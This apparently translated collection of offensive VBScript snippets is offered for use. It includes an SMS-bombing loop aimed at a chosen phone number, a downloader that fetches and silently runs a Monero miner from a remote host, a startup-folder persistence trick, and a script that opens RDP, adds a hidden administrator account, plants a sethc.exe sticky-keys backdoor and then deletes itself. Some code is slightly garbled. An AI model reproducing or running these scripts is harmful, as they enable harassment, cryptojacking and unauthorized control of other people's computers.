SMS bombing
Dim btn,ie Set ie = WScript.CreateObject("InternetExplorer.Application") ie.Visible = true ' If it is false, the browser will not be displayed ie.navigate " http://www.dooccn.com/php7/#id/53e57045ca9d15fee7793a3bf66e57c3 " ' http://www.dooccn.com/php7/# id/f16690b98a87d61c72e8a09fac740a53 go in and replace 15555555555 with the number you want to blast, then click to share the current code. Copy the connection of the shared code into the target connection and it is OK. Do ' Do Loop is a loop structure Do Wscript.Sleep 200 Loop Until ie.readyState = 4 ' When the page is loaded completely, fill in the login data and log in Set btn =ie.Document. getElementById( " btn " ) btn.click Wscript.Sleep 5000 ' Bomb the Loop every five seconds
Monero mining
Set objXMLHTTP=CreateObject("MSXML2.XMLHTTP") objXMLHTTP.open " GET " , " http://xxx.xxx.xxx.xxx/mdx.exe " , false ' Background download mining software mdx.exe objXMLHTTP.send() If objXMLHTTP.Status= 200 Then Set objADOStream= CreateObject ( " ADODB.Stream " ) objADOStream.Open objADOStream.Type=1 objADOzStream.Write objXMLHTTP.ResponseBody objADOStream.Position=0 objADOStream.SaveToFile "mdx.exe" objADOStream.Close Set objADOStream=Nothing End if Set objXMLHTTP=Nothing Set objShell=CreateObject("WScript.Shell") '后台挖矿 objShell.Exec("mdx.exe -o stratum+tcp://xxxxxxxx.com:3333 -u 46E9UkTFqALXNh2mSbAfskfsVgUgPVdT9ZdtweLRvAhWmbvuY1dh5ZRb4qJzFXLVHGYH4moQ -p x")
Auto-start
dim fso,ws,pt,msg ' Add this to the top of your vbs set fso = createobject ( " scripting.filesystemobject " ) set ws = createobject ( " wscript.shell " ) set file = fso.getfile(wscript.scriptfullname ) pt = ws.specialfolders("startup")&"\" file.copy pt sub Close_Process(ProcessName) On Error Resume Next end sub
Open 3389+ non-net create management user+Shift backdoor+self-delete script
on error resume next const HKEY_LOCAL_MACHINE = &H80000002 strComputer = "." Set StdOut = WScript.StdOut Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_ strComputer & "\root\default:StdRegProv") strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server" oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server" strValueName = "fDenyTSConnections" dwValue = 0 oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" strValueName = "PortNumber" dwValue = 3389 oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" strValueName = "PortNumber" dwValue = 3389 oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue on error resume next dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="0x7863$":password="3253220":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath On Error Resume Next Dim obj, success Set obj = CreateObject("WScript.Shell") success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F© %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe© %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True) CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName) BY:c32 QQȺ:43910940 BLOG:www.19aq.com
go password
Set args = WScript.Arguments if args.count<>1 then msgbox "db.mdb":wscript.quit Set conn =CreateObject("ADODB.Connection") pwd="密"&chr(13)&chr(9)&chr(10)&"码"&chr(2) connStr = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source=" & args(0)&" ;Mode=Share Deny Read|Share Deny Write;Persist Security Info=False;Jet OLEDB:Database Password="&pwd&";" conn.open connstr conn.execute("ALTER DATABASE Password [123456] ["&pwd&"]") conn.close msgbox "done"